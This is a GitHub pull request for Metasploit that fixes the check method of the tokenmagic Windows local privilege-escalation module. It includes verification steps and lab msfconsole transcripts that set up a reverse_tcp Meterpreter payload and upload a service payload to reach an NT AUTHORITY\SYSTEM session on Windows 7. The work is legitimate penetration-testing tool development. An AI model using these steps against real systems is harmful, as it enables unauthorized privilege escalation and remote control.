Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update check method and move it to earlier in the module #15223

Merged
merged 1 commit into from
May 24, 2021
Merged

Update check method and move it to earlier in the module #15223

merged 1 commit into from
May 24, 2021

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented May 19, 2021
edited by space-r7
Loading

It turns out that while this technique should work on Windows 7 SP0, the act of loading our Powershell module seems to crash the targets I'm testing. Regardless, we should not have loaded the powershell module before executing the check method. That was likely my fault.

No one else has verified this behavior, but I built a second target and it behaved in the exact same manner. Based on that, I updated the check method, and moved it before the Powershell loading call.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • set method service
  • get a default user meterpreter session on a Windows 7 sp0 target
  • use exploit/windows/local/tokenmagic
  • set session x
  • run
  • Verify the check method tells you no, and the session remains intact
  • set method dll
  • Verify the check method tells you no, and the session remains intact
  • get a default user meterpreter session on a Windows 7 sp1 target
  • set method service
  • run
  • feel victorious about your new, shiny SYSTEM-level session.

@jheysel-r7

@bwatters-r7 bwatters-r7 added bug easy rn-fix release notes fix labels May 19, 2021
@space-r7 space-r7 self-assigned this May 24, 2021
@space-r7
Copy link
Contributor

Worked for me:

SP0 
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (200262 bytes) to 192.168.37.1
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.1:50922) at 2021-05-24 13:26:42 -0500

meterpreter > sysinfo
Computer        : WIN-J5JFRK4NUUD
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(windows/local/tokenmagic) > options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack me
                                                thod you would like to use (SERVICE by defaul
                                                t).
Note that the System Orchestrator service
                                                 which loads the overwritten DLL when using t
                                                he DLL method can take up to 10
minutes to tr
                                                igger (Accepted: SERVICE, DLL)
   SERVICE_FILENAME  HdvUou           no        Filename for Service Payload (Random by defau
                                                lt).
   SERVICE_NAME      xCMiJpk          no        Service Name to use (Random by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default
                                                ).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, n
                                        one)
   LHOST     192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > set method DLL
method => DLL
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-J5JFRK4NUUD\space
SP1 
meterpreter > sysinfo
Computer        : WIN-EV41RSSPETD
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > previous
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            DLL              yes       SERVICE or DLL, please select which attack me
                                                thod you would like to use (SERVICE by defaul
                                                t).
Note that the System Orchestrator service
                                                 which loads the overwritten DLL when using t
                                                he DLL method can take up to 10
minutes to tr
                                                igger (Accepted: SERVICE, DLL)
   SERVICE_FILENAME  HdvUou           no        Filename for Service Payload (Random by defau
                                                lt).
   SERVICE_NAME      xCMiJpk          no        Service Name to use (Random by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default
                                                ).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, n
                                        one)
   LHOST     192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > set method SERVICE
method => SERVICE
msf6 exploit(windows/local/tokenmagic) > set session 2
session => 2
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on WIN-EV41RSSPETD via session ID: 2
[*] Uploading payload to C:\Users\space\AppData\Local\Temp\HdvUou.exe
[*] Running Exploit on WIN-EV41RSSPETD
[*] Executing TokenMagic PowerShell script
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 192.168.37.133
[+] Deleted C:\Users\space\AppData\Local\Temp\HdvUou.exe
[*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.133:49159) at 2021-05-24 14:11:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-EV41RSSPETD
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows

@bwatters-r7
Copy link
Contributor Author

@space-r7 you rock!
Out of curiosity, could I impose on you to force the exploit on SP0 or test it against the current main branch? I just want to make sure that someone else can recreate the bug this PR is trying to fix.

@space-r7
Copy link
Contributor

@space-r7 you rock!
Out of curiosity, could I impose on you to force the exploit on SP0 or test it against the current main branch? I just want to make sure that someone else can recreate the bug this PR is trying to fix.

Absolutely!

@space-r7
Copy link
Contributor

Is this similar to what you were experiencing? The module hangs for a while, then you eventually receive the session message?

meterpreter > sysinfo
Computer        : WIN-Q3ETOCF474V
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-Q3ETOCF474V\space
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/tokenmagic 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: Died


^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted

@bwatters-r7
Copy link
Contributor Author

Yup; that's exactly it. Thanks so much for verifying!

@space-r7 space-r7 merged commit 8e4a33f into rapid7:master May 24, 2021
@space-r7
Copy link
Contributor

space-r7 commented May 24, 2021
edited by pbarry-r7
Loading

Release Notes

Updated the exploit/windows/local/tokenmagic module to fix a crash that occurs on some targets, moving the target validation logic to earlier in the module.

@bwatters-r7 bwatters-r7 deleted the update-tokenmagic-check branch October 5, 2021 19:48
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
bug easy rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@bwatters-r7 @space-r7